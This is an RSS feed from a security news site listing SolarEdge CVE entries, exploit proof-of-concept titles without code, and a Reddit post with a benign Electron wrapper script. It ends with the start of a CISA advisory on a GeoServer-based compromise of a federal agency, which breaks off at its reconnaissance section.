<title><![CDATA[CVE-2025-36744 | SolarEdge SE3680H up to 4.21 debug messages revealing unnecessary information]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in SolarEdge SE3680H up to 4.21. This affects an unknown function. This manipulation causes debug messages revealing unnecessary information.

This vulnerability appears as CVE-2025-36744. It is feasible to perform the attack on the physica...]]></description>
<link>https://tsecurity.de/de/3177297/sicherheitsluecken/cve-2025-36744-solaredge-se3680h-up-to-421-debug-messages-revealing-unnecessary-information/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3177297/sicherheitsluecken/cve-2025-36744-solaredge-se3680h-up-to-421-debug-messages-revealing-unnecessary-information/</guid>
<pubDate>Wed, 24 Dec 2025 08:25:35 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">problematic</a> has been found in <a href="https://vuldb.com/?product.solaredge:se3680h">SolarEdge SE3680H up to 4.21</a>. This affects an unknown function. This manipulation causes debug messages revealing unnecessary information.

This vulnerability appears as <a href="https://vuldb.com/?source_cve.336224">CVE-2025-36744</a>. It is feasible to perform the attack on the physical device. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-36746 | SolarEdge Monitoring platform cross site scripting]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in SolarEdge Monitoring platform. Affected is an unknown function. Performing manipulation results in cross site scripting.

This vulnerability is known as CVE-2025-36746. Remote exploitation of the attack is possible. No exploi...]]></description>
<link>https://tsecurity.de/de/3163459/sicherheitsluecken/cve-2025-36746-solaredge-monitoring-platform-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3163459/sicherheitsluecken/cve-2025-36746-solaredge-monitoring-platform-cross-site-scripting/</guid>
<pubDate>Wed, 17 Dec 2025 02:36:26 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">problematic</a>, has been found in <a href="https://vuldb.com/?product.solaredge:monitoring_platform">SolarEdge Monitoring platform</a>. Affected is an unknown function. Performing manipulation results in cross site scripting.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.336226">CVE-2025-36746</a>. Remote exploitation of the attack is possible. No exploit is available.

This product is a managed service. This means that users cannot maintain vulnerability countermeasures themselves.]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Summar Employee Portal  3.98.0 - Authenticated SQL Injection]]></title>
<description><![CDATA[Summar Employee Portal  3.98.0 - Authenticated SQL Injection]]></description>
<link>https://tsecurity.de/de/3161486/poc/webapps-summar-employee-portal-3980-authenticated-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3161486/poc/webapps-summar-employee-portal-3980-authenticated-sql-injection/</guid>
<pubDate>Tue, 16 Dec 2025 07:52:41 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Summar Employee Portal  3.98.0 - Authenticated SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] esm-dev 136 - Path Traversal]]></title>
<description><![CDATA[esm-dev 136 - Path Traversal]]></description>
<link>https://tsecurity.de/de/3161485/poc/webapps-esm-dev-136-path-traversal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3161485/poc/webapps-esm-dev-136-path-traversal/</guid>
<pubDate>Tue, 16 Dec 2025 07:52:40 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[esm-dev 136 - Path Traversal]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-36745 | SolarEdge SE3680H up to 4.21 Linux Kernel unmaintained third party components]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in SolarEdge SE3680H up to 4.21. The impacted element is an unknown function of the component Linux Kernel. The manipulation results in use of unmaintained third party components.

This vulnerability is reported as CVE-2025-36745. An attac...]]></description>
<link>https://tsecurity.de/de/3155877/sicherheitsluecken/cve-2025-36745-solaredge-se3680h-up-to-421-linux-kernel-unmaintained-third-party-components/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3155877/sicherheitsluecken/cve-2025-36745-solaredge-se3680h-up-to-421-linux-kernel-unmaintained-third-party-components/</guid>
<pubDate>Fri, 12 Dec 2025 17:54:21 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/?kb.risk">critical</a> has been identified in <a href="https://vuldb.com/?product.solaredge:se3680h">SolarEdge SE3680H up to 4.21</a>. The impacted element is an unknown function of the component <em>Linux Kernel</em>. The manipulation results in use of unmaintained third party components.

This vulnerability is reported as <a href="https://vuldb.com/?source_cve.336223">CVE-2025-36745</a>. An attack on the physical device is feasible. No exploit exists.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Pluck 4.7.7-dev2 -  PHP Code Execution]]></title>
<description><![CDATA[Pluck 4.7.7-dev2 -  PHP Code Execution]]></description>
<link>https://tsecurity.de/de/3146066/poc/webapps-pluck-477-dev2-php-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3146066/poc/webapps-pluck-477-dev2-php-code-execution/</guid>
<pubDate>Mon, 08 Dec 2025 17:35:23 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Pluck 4.7.7-dev2 -  PHP Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[Underrated way to make webapps on linux using electron]]></title>
<description><![CDATA[Best thing is that it uses your system's Electron for making "webapps" Most distros have some Electron version in their repos, hence you don't need any npm/node fluff or have to worry about your webapps being 200 MB each. The method is basically writing a JavaScript script and using Electron as t...]]></description>
<link>https://tsecurity.de/de/3137625/linux-tipps/underrated-way-to-make-webapps-on-linux-using-electron/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3137625/linux-tipps/underrated-way-to-make-webapps-on-linux-using-electron/</guid>
<pubDate>Thu, 04 Dec 2025 07:38:53 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><strong>Best thing is that it uses your system's Electron for making "webapps"</strong><br> Most distros have some Electron version in their repos, hence you don't need any npm/node fluff or have to worry about your webapps being 200 MB each.</p> <p>The method is basically writing a JavaScript script and using Electron as the shebang; you can make a desktop entry for it yourself.</p> <p>(I Wrote the script below using AI — please verify &amp; share if you find any bugs)</p> <pre><code>#!/bin/electron35 --ozone-platform-hint=auto const { app, BrowserWindow } = require('electron'); const path = require('path'); const fs = require('fs'); // -------------------- // Configurable variables // -------------------- const SITE_URL = 'https://discord.com/login'; const ZOOM_FACTOR = 1.3; const STORAGE_PATH = path.join(app.getPath('home'), '.local/share/discord-webapp'); // -------------------- // Ensure persistent storage exists // -------------------- if (!fs.existsSync(STORAGE_PATH)) fs.mkdirSync(STORAGE_PATH, { recursive: true }); app.setPath('userData', STORAGE_PATH); // -------------------- // Create the main window // -------------------- function createWindow() { const win = new BrowserWindow({ width: 900, height: 600, frame: false, // hide toolbar / menu webPreferences: { nodeIntegration: false, contextIsolation: true } }); // Load site and set zoom factor win.loadURL(SITE_URL); win.webContents.on('did-finish-load', () =&gt; { win.webContents.setZoomFactor(ZOOM_FACTOR); }); } // -------------------- // App lifecycle // -------------------- app.whenReady().then(createWindow); app.on('window-all-closed', () =&gt; { app.quit(); }); </code></pre> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/meow_miao_nya"> /u/meow_miao_nya </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1pdt1ig/underrated_way_to_make_webapps_on_linux_using/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1pdt1ig/underrated_way_to_make_webapps_on_linux_using/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] MaNGOSWebV4  4.0.6 - Reflected XSS]]></title>
<description><![CDATA[MaNGOSWebV4  4.0.6 - Reflected XSS]]></description>
<link>https://tsecurity.de/de/3136724/poc/webapps-mangoswebv4-406-reflected-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3136724/poc/webapps-mangoswebv4-406-reflected-xss/</guid>
<pubDate>Wed, 03 Dec 2025 18:21:49 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[MaNGOSWebV4  4.0.6 - Reflected XSS]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)]]></title>
<description><![CDATA[phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)]]></description>
<link>https://tsecurity.de/de/3136723/poc/webapps-phpmyfaq-298-cross-site-request-forgerycsrf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3136723/poc/webapps-phpmyfaq-298-cross-site-request-forgerycsrf/</guid>
<pubDate>Wed, 03 Dec 2025 18:21:48 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] phpMyFAQ  2.9.8 - Cross-Site Request Forgery (CSRF)]]></title>
<description><![CDATA[phpMyFAQ  2.9.8 - Cross-Site Request Forgery (CSRF)]]></description>
<link>https://tsecurity.de/de/3136722/poc/webapps-phpmyfaq-298-cross-site-request-forgery-csrf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3136722/poc/webapps-phpmyfaq-298-cross-site-request-forgery-csrf/</guid>
<pubDate>Wed, 03 Dec 2025 18:21:47 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[phpMyFAQ  2.9.8 - Cross-Site Request Forgery (CSRF)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Django 5.1.13 - SQL Injection]]></title>
<description><![CDATA[Django 5.1.13 - SQL Injection]]></description>
<link>https://tsecurity.de/de/3136674/poc/webapps-django-5113-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3136674/poc/webapps-django-5113-sql-injection/</guid>
<pubDate>Wed, 03 Dec 2025 18:06:34 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Django 5.1.13 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)]]></title>
<description><![CDATA[phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)]]></description>
<link>https://tsecurity.de/de/3136577/poc/webapps-phpmyfaq-298-cross-site-request-forgery-csrf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3136577/poc/webapps-phpmyfaq-298-cross-site-request-forgery-csrf/</guid>
<pubDate>Wed, 03 Dec 2025 17:37:33 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] MobileDetect 2.8.31 - Cross-Site Scripting (XSS)]]></title>
<description><![CDATA[MobileDetect 2.8.31 - Cross-Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/3135522/poc/webapps-mobiledetect-2831-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3135522/poc/webapps-mobiledetect-2831-cross-site-scripting-xss/</guid>
<pubDate>Wed, 03 Dec 2025 10:21:34 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[MobileDetect 2.8.31 - Cross-Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] phpMyAdmin 5.0.0 - SQL Injection]]></title>
<description><![CDATA[phpMyAdmin 5.0.0 - SQL Injection]]></description>
<link>https://tsecurity.de/de/3135521/poc/webapps-phpmyadmin-500-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3135521/poc/webapps-phpmyadmin-500-sql-injection/</guid>
<pubDate>Wed, 03 Dec 2025 10:21:33 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[phpMyAdmin 5.0.0 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] phpIPAM 1.4 - SQL-Injection]]></title>
<description><![CDATA[phpIPAM 1.4 - SQL-Injection]]></description>
<link>https://tsecurity.de/de/3135520/poc/webapps-phpipam-14-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3135520/poc/webapps-phpipam-14-sql-injection/</guid>
<pubDate>Wed, 03 Dec 2025 10:21:32 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[phpIPAM 1.4 - SQL-Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] OpenRepeater 2.1 - OS Command Injection]]></title>
<description><![CDATA[OpenRepeater 2.1 - OS Command Injection]]></description>
<link>https://tsecurity.de/de/3135519/poc/webapps-openrepeater-21-os-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3135519/poc/webapps-openrepeater-21-os-command-injection/</guid>
<pubDate>Wed, 03 Dec 2025 10:21:30 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenRepeater 2.1 - OS Command Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] RosarioSIS 6.7.2 - Cross-Site Scripting (XSS)]]></title>
<description><![CDATA[RosarioSIS 6.7.2 - Cross-Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/3135485/poc/webapps-rosariosis-672-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3135485/poc/webapps-rosariosis-672-cross-site-scripting-xss/</guid>
<pubDate>Wed, 03 Dec 2025 10:07:21 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[RosarioSIS 6.7.2 - Cross-Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] RosarioSIS 6.7.2 - Cross Site Scripting (XSS)]]></title>
<description><![CDATA[RosarioSIS 6.7.2 - Cross Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/3135484/poc/webapps-rosariosis-672-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3135484/poc/webapps-rosariosis-672-cross-site-scripting-xss/</guid>
<pubDate>Wed, 03 Dec 2025 10:07:19 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[RosarioSIS 6.7.2 - Cross Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] PluckCMS 4.7.10 - Unrestricted File Upload]]></title>
<description><![CDATA[PluckCMS 4.7.10 - Unrestricted File Upload]]></description>
<link>https://tsecurity.de/de/3135468/poc/webapps-pluckcms-4710-unrestricted-file-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3135468/poc/webapps-pluckcms-4710-unrestricted-file-upload/</guid>
<pubDate>Wed, 03 Dec 2025 09:51:53 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[PluckCMS 4.7.10 - Unrestricted File Upload]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] openSIS Community Edition 8.0 - SQL Injection]]></title>
<description><![CDATA[openSIS Community Edition 8.0 - SQL Injection]]></description>
<link>https://tsecurity.de/de/3135446/poc/webapps-opensis-community-edition-80-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3135446/poc/webapps-opensis-community-edition-80-sql-injection/</guid>
<pubDate>Wed, 03 Dec 2025 09:40:56 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[openSIS Community Edition 8.0 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] YOURLS 1.8.2 - Cross-Site Request Forgery (CSRF)]]></title>
<description><![CDATA[YOURLS 1.8.2 - Cross-Site Request Forgery (CSRF)]]></description>
<link>https://tsecurity.de/de/3134031/poc/webapps-yourls-182-cross-site-request-forgery-csrf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3134031/poc/webapps-yourls-182-cross-site-request-forgery-csrf/</guid>
<pubDate>Tue, 02 Dec 2025 18:51:51 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[YOURLS 1.8.2 - Cross-Site Request Forgery (CSRF)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] phpIPAM 1.5.1 - SQL Injection]]></title>
<description><![CDATA[phpIPAM 1.5.1 - SQL Injection]]></description>
<link>https://tsecurity.de/de/3134030/poc/webapps-phpipam-151-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3134030/poc/webapps-phpipam-151-sql-injection/</guid>
<pubDate>Tue, 02 Dec 2025 18:51:50 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[phpIPAM 1.5.1 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] phpMyFAQ  3.1.7 - Reflected Cross-Site Scripting (XSS)]]></title>
<description><![CDATA[phpMyFAQ  3.1.7 - Reflected Cross-Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/3134029/poc/webapps-phpmyfaq-317-reflected-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3134029/poc/webapps-phpmyfaq-317-reflected-cross-site-scripting-xss/</guid>
<pubDate>Tue, 02 Dec 2025 18:51:48 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[phpMyFAQ  3.1.7 - Reflected Cross-Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] phpIPAM 1.6 - Reflected-Cross-Site Scripting (XSS)]]></title>
<description><![CDATA[phpIPAM 1.6 - Reflected-Cross-Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/3133984/poc/webapps-phpipam-16-reflected-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3133984/poc/webapps-phpipam-16-reflected-cross-site-scripting-xss/</guid>
<pubDate>Tue, 02 Dec 2025 18:35:16 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[phpIPAM 1.6 - Reflected-Cross-Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Piwigo 13.6.0 - SQL Injection]]></title>
<description><![CDATA[Piwigo 13.6.0 - SQL Injection]]></description>
<link>https://tsecurity.de/de/3133983/poc/webapps-piwigo-1360-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3133983/poc/webapps-piwigo-1360-sql-injection/</guid>
<pubDate>Tue, 02 Dec 2025 18:35:15 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Piwigo 13.6.0 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)]]></title>
<description><![CDATA[phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/3133945/poc/webapps-phpipam-16-reflected-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3133945/poc/webapps-phpipam-16-reflected-cross-site-scripting-xss/</guid>
<pubDate>Tue, 02 Dec 2025 18:21:20 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA Shares Lessons Learned from an Incident Response Engagement]]></title>
<description><![CDATA[Advisory at a Glance



Executive Summary
CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency’s endpoint detection and response (EDR) tool....]]></description>
<link>https://tsecurity.de/de/3113764/sicherheitsluecken/cisa-shares-lessons-learned-from-an-incident-response-engagement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3113764/sicherheitsluecken/cisa-shares-lessons-learned-from-an-incident-response-engagement/</guid>
<pubDate>Sat, 22 Nov 2025 09:52:03 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><strong>Advisory at a Glance</strong></h2>
<table>
<tbody>
<tr>
<td>Executive Summary</td>
<td>CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate risk, prepare for, and respond to incidents: vulnerabilities were not promptly remediated, the agency did not test or exercise their incident response plan (IRP), and EDR alerts were not continuously reviewed.</td>
</tr>
<tr>
<td>Key Actions</td>
<td>
<ul>
<li><strong>Prevent compromise</strong> by prioritizing the patching of critical vulnerabilities in public-facing systems and known exploited vulnerabilities.</li>
<li><strong>Prepare for incidents</strong> by maintaining, practicing, and updating incident response plans.</li>
<li><strong>Prepare for incidents</strong> by implementing comprehensive and verbose logging and aggregate logs in a centralized out-of-band location.</li>
</ul>
</td>
</tr>
<tr>
<td>Indicators of Compromise </td>
<td>
<p>For a downloadable copy of indicators of compromise, see: </p>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-JSON.stix_.json" title="JSON AA25-266A">AA25-266A-JSON.stix_.json</a></li>
<li><a href="https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-STIX.stix_.xml" title="STIX AA25-266A">AA25-266A-STIX.stix_.xml</a></li>
</ul>
</td>
</tr>
<tr>
<td>Intended Audience</td>
<td>
<p><strong>Organizations:</strong> FCEB agencies and critical infrastructure organizations.</p>
<p><strong>Roles:</strong> <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/defensive-cybersecurity" title="Defensive Cybersecurity Analysts">Defensive Cybersecurity Analysts</a>, <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/vulnerability-analysis" title="Vulnerability Analysts">Vulnerability Analysts</a>, <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/systems-security-management" title="Security Systems Managers">Security Systems Managers</a>, <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/systems-security-analysis" title="Systems Security Analysts">Systems Security Analysts</a>, and <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/cybersecurity-policy-and-planning" title="Cybersecurity Policy and Planning Professionals">Cybersecurity Policy and Planning Professionals</a>.</p>
</td>
</tr>
<tr>
<td>Download the PDF version of this report</td>
<td><a class="c-button c-button--on-dark c-button--download" href="https://www.cisa.gov/sites/default/files/2025-09/AA25-266A_advisory_cisa_shares_lessons_learned_from_ir_engagement.pdf" title="PDF CISA Shares Lessons Learned from an Incident Response Engagement">AA25-266A advisory cisa shares lessons learned from ir engagement</a></td>
</tr>
</tbody>
</table>
<h2><strong>Introduction</strong></h2>
<p><em>The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to highlight lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency. CISA is publicizing this advisory to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and aggregating logs in a centralized out-of-band location. CISA is also raising awareness about the tactics, techniques, and procedures (TTPs) employed by these cyber threat actors to help organizations safeguard against similar exploits.</em></p>
<p>CISA began incident response efforts at an FCEB agency after the agency identified potential malicious activity through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA discovered cyber threat actors compromised the agency by exploiting <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE-2024-36401">CVE-2024-36401</a> in a GeoServer about three weeks prior to the EDR alerts. Over the three-week period, the cyber threat actors gained separate initial access to a second GeoServer via the same vulnerability and moved laterally to two other servers.</p>
<p>Leveraging insights CISA gleaned from the organization’s security posture and response, CISA is sharing lessons learned for organizations to mitigate similar compromises (see <a href="https://www.cisa.gov/#Lessons%20Learned" title="Lessons Learned"><strong>Lessons Learned</strong></a> for more details):</p>
<ol>
<li><strong>Vulnerabilities were not promptly remediated.</strong>
<ol>
<li>The cyber threat actors exploited <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE-2024-36401">CVE-2024-36401</a> for initial access on two GeoServers.</li>
<li>The vulnerability was disclosed 11 days prior to the cyber threat actors accessing the first GeoServer and 25 days prior to them accessing the second GeoServer.</li>
</ol>
</li>
<li><strong>The agency did not test or exercise their incident response plan (IRP), nor did their IRP enable them to promptly engage third parties and grant third parties access to necessary resources.</strong>
<ol>
<li>This delayed certain elements of CISA’s response as the IRP did not have procedures for involving third-party assistance or for granting third-party access to their security tools.</li>
</ol>
</li>
<li><strong>EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection.</strong>
<ol>
<li>The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity earlier as they did not observe an alert from a GeoServer and the Web Server did not have endpoint protection.</li>
</ol>
</li>
</ol>
<p>These lessons highlight strategies to effectively mitigate risk, enhance preparedness, and respond to incidents with greater efficiency. CISA encourages all organizations to consider the lessons learned and apply the associated recommendations in the <a href="https://www.cisa.gov/#Mitigations" title="Mitigations"><strong>Mitigations</strong></a> section of this advisory to improve their security posture.</p>
<p>This advisory also provides the cyber threat actors’ TTPs and indicators of compromise (IOCs). For a downloadable copy of IOCs, see:</p>
<div>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-JSON.stix_.json" title="JSON AA25-266A">AA25-266A-JSON.stix_.json</a></li>
<li><a href="https://www.cisa.gov/sites/default/files/2025-09/AA25-266A-STIX.stix_.xml" title="STIX AA25-266A">AA25-266A-STIX.stix_.xml</a></li>
</ul>
<h2><strong>Technical Details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v17/matrices/enterprise/" target="_blank" title="MITRE ATTACK Matrix for Enterprise">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 17. See the <a href="https://www.cisa.gov/#MITRE%20ATT&amp;CK%20Tactics%20and%20Techniques" title="MITRE ATT&amp;CK Tactics and Techniques"><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></a> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3>Threat Actor Activity</h3>
<p>CISA responded to a suspected compromise of a large FCEB agency after the agency’s security operations center (SOC) observed multiple endpoint security alerts.</p>
<p>During the incident response, CISA discovered that cyber threat actors gained access to the agency’s network on July 11, 2024, by exploiting GeoServer vulnerability <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE 2024-36401">CVE 2024-36401</a> [<a href="https://cwe.mitre.org/data/definitions/95.html" target="_blank" title="CWE-95: Eval Injection">CWE-95: “Eval Injection”</a>] on a public-facing GeoServer (GeoServer 1). This critical vulnerability, disclosed June 30, 2024, allows unauthenticated users to gain remote code execution (RCE) on affected GeoServer versions <a href="https://www.cisa.gov/#GeoServer" title="Footnote Reference 1"><sup>[1]</sup></a>. The cyber threat actors used this vulnerability to download open source tools and scripts and establish persistence in the agency’s network. (CISA added this vulnerability to its <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities (KEV) Catalog">Known Exploited Vulnerabilities (KEV) Catalog</a> on July 15, 2024.)</p>
<p>After gaining initial access to GeoServer 1, the cyber threat actors gained separate initial access to a second GeoServer (GeoServer 2) on July 24, 2024, by exploiting the same vulnerability. They moved laterally from GeoServer 1 to a web server (Web Server) and then a Structured Query Language (SQL) server. On each server, they uploaded (or attempted to upload) web shells such as <a href="https://attack.mitre.org/software/S0020/" target="_blank" title="China Chopper">China Chopper</a>, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="living off the land (LOTL)">living off the land (LOTL)</a> techniques.</p>
<p>See <a href="https://www.cisa.gov/#Figure%C2%A01.%20Overview%20of%20Threat%20Actor%20Activity" title="Figure 1. Overview of Threat Actor Activity"><strong>Figure 1</strong></a> for an overview of the cyber threat actors’ activity and the following sections for detailed threat actors TTPs.</p>
<p><a class="ck-anchor">Figure 1. Overview of Threat Actor Activity</a></p>
  
  
  
  
<figure class="c-figure c-figure--large c-figure--image" role="group">
  
  <div class="c-figure__media">  <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2025-09/Overview%20of%20Threat%20Actor%20Activity.jpg?itok=uRWN4aW3" width="924" height="457" alt="Image outlining threat actor activity">


</div>
  </figure>
<h3>Reconnaissance</h3>
